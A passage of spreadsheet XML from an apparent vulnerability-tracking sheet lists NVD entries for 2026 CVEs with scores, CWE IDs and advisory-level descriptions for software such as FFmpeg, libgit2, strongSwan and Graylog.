      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the target_sws_fuzzer() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38350</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38636</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>An issue in the seekdir() function (/dirent/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38636</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38638</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>An issue in the with_argv function (/unistd/mod.rs) of relibc commit 61f42d allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38638</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46369</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr"/>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-294</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Through 1.5.0, the validity store uses a strict lower-bound comparison that expires a stored transaction too early relative to Transaction::is_valid_at, allowing a remote attacker to replay the same signed transaction during a blocks_per_batch minus one block window and cause the sender and recipient balances to be updated twice. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46369</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47895</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-08-22</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>In strongSwan before 6.0.7, identity parsing/cloning is mishandled. Parsed EAP-Identities that result in an empty but non-NULL encoding are not correctly cloned and trigger a double-free once the duplicates are destroyed.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47895</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48486</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>Signum Node is a HDD-mined cryptocurrency using an energy efficient and fair Proof-of-Commitment (PoC+) consensus algorithm. Prior to version 3.9.9, an integer overflow in BlockServiceImpl.applyBlock() allowed a miner to receive an arbitrarily inflated block reward by crafting a block with a negative totalFeeCashBackNqt value. The vulnerability was introduced when the SMART_FEES hardfork (block ~1,029,000) enabled fee cash-back and burn accounting without overflow protection. This issue has been patched in version 3.9.9.</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48486</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52482</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>An issue in SJRC F11 SJ-GPS-PRO firmware build 2019-09-17 allows a remote attacker to obtain sensitive information via the inetd service spawns /app/sh_for_telnet</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52482</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53587</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-126, CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Prior to 1.8.6 and 1.9.5, libgit2 performs a fixed-size strncmp in set_data in src/libgit2/transports/smart_pkt.c without first verifying that the smart-protocol pkt-line capability buffer contains 14 bytes. A malicious Git server can make bytes after the pkt-line complete object-format=, causing format_str to advance beyond the pkt-line and the following memchr length calculation to underflow. The resulting heap out-of-bounds walk can crash a client during the first refs-advertisement packet over HTTP, HTTPS, SSH, or the Git protocol. This issue is fixed in versions 1.8.6 and 1.9.5.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53587</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54788</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>dd-trace-rs provides Datadog application performance monitoring for Rust. From 0.1.0 until 0.3.3, datadog-opentelemetry/src/propagation/tracecontext.rs parses the W3C tracestate header and collects every semicolon-separated key and value pair in the Datadog dd=... vendor entry into a HashMap without enforcing a pair count or entry size limit. Because tracecontext extraction is enabled by default, a remote unauthenticated attacker can send an arbitrarily large dd=... entry and force excessive CPU and memory consumption for each request, causing denial of service in an instrumented network service. This vulnerability is fixed in 0.3.3.</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54788</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55099</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>icalendar is an RFC 5545 compatible parser and generator of iCalendar files for Python. From 7.1.0 until 7.1.3, the Component equality method in src/icalendar/cal/component.py compares nested subcomponents with two membership loops, and each membership test invokes the same method on child components, causing O(2^n) work relative to nesting depth. Component.from_ical accepts arbitrarily nested BEGIN:VEVENT blocks without a depth limit, so an attacker can submit a sub-kilobyte .ics file containing equal nested subtrees and trigger the cost when an application performs equality, inequality, membership, deduplication, test-assertion, round-trip, or normalization comparisons. Parsing alone does not trigger the issue, and comparisons that differ early short-circuit, but a few hundred bytes can pin a CPU core for minutes or indefinitely, causing denial of service in calendar sync or import endpoints, invite processing, and other comparison paths. This issue is fixed in version 7.1.3.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55099</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55484</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-754</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>ALOS HTTP is a Linux-first Go web framework and application server built around a custom networking stack. Prior to 0.0.0-20260617230736-314b6783e196, core/utils.go::sanitizeRequestPath calls splitPathQuery on a request path beginning with a question mark and then performs the unchecked p[0] access without checking whether the resulting path is empty. An unauthenticated client can send a malformed request such as a question-mark-only path through h1_plain.go::ParseH1RequestHead, hpack.go::decodeSimpleGetPathHTTPSRequest, hpack.go::observeHeader, or h3_conn.go::handleRequestStream, causing an out-of-bounds panic before core.Recovery() middleware runs and terminating the server process. This issue is fixed in pseudo-version 0.0.0-20260617230736-314b6783e196.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55484</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55525</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, the web_crawl function validates only the initial URL before _crawl_with_httpx uses httpx.Client(follow_redirects=True). Redirect targets are not revalidated, so an attacker who influences a crawl target can redirect a public URL to loopback, private network, or cloud metadata services while ALLOW_LOCAL_CRAWL remains disabled. The fetched internal response is returned to the agent context. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55525</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55553</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201, CWE-522</t>
        </is>
      </c>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>urllib is an HTTP client for Node.js that supports authentication, redirects, timeouts, and other request features. Prior to 4.9.1 and 2.44.1, urllib follows redirects through followRedirect but reuses caller-supplied options across origins. In src/HttpClient.ts, #requestInternal recursively calls this.#requestInternal(nextUrl.href, options, requestContext), causing options.headers and auth or digestAuth values to be reused when the redirect target has a different scheme, host, or port. Authorization, Cookie, Proxy-Authorization, x-api-key, x-auth-token, and x-access-token can therefore be sent to an attacker-controlled redirected origin, exposing credentials intended for the original origin and potentially allowing reuse against the original partner API or related services. No user interaction is required. This issue is fixed in versions 2.44.1 and 4.9.1.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55553</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55584</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr"/>
      <c r="Q479" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>phpSysInfo is a customizable PHP script that displays system information. Prior to 3.4.6, the PSI_ALLOWED access-control check in read_config.php trusts attacker-controlled X-Forwarded-For and Client-IP HTTP headers before REMOTE_ADDR. A remote unauthenticated attacker can supply an allowed address in one of these headers to impersonate a trusted client and access exposed hostname, kernel, CPU, memory, filesystem, and network-interface information. This issue is fixed in version 3.4.6.</t>
        </is>
      </c>
      <c r="S479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55584</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55620</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr"/>
      <c r="Q480" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.routing.noparenthesis in eml_parser/routing.py removes parenthesized CFWS comments from Received: headers with a regex-based fix-point loop whose running time is quadratic in the nesting depth. A single Received: header with 5,000 nested parentheses causes approximately 1.3 seconds of CPU saturation per parsed message, and doubling the nesting depth approximately quadruples the running time. An attacker can submit relatively small EML files that consume multiple seconds of processing time, causing worker latency, queue backpressure, and possible service-level outages in synchronous gateways, sandboxes, and real-time triage pipelines. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="S480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55620</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55841</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr"/>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr"/>
      <c r="Q481" s="5" t="inlineStr">
        <is>
          <t>CWE-138</t>
        </is>
      </c>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. Prior to Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3, the FortiGate key-value syslog parser in graylog2-server/src/main/java/org/graylog2/inputs/codecs/GLFortiGateSyslogEvent.java and graylog2-server/src/main/java/org/graylog2/inputs/codecs/SyslogCodec.java mishandles field-like text inside quoted values. GLFortiGateSyslogEvent.getFields() uses KV_PATTERN and QUOTED_KV_PATTERN, while SyslogCodec.parse() invokes the FortiGateSyslogEvent parser; crafted values containing = or backslash-escaped quotes can cause embedded keys such as srcip, dstip, date, time, and tz to remove or overwrite original top-level fields or produce an invalid message that Graylog discards. An unauthenticated network sender who can submit syslog messages can therefore manipulate security-log fields or evade logging to obscure malicious activity. This issue is fixed in Graylog Server versions 6.3.12, 7.0.7, and 7.1.2 and Graylog Forwarder version 7.3.</t>
        </is>
      </c>
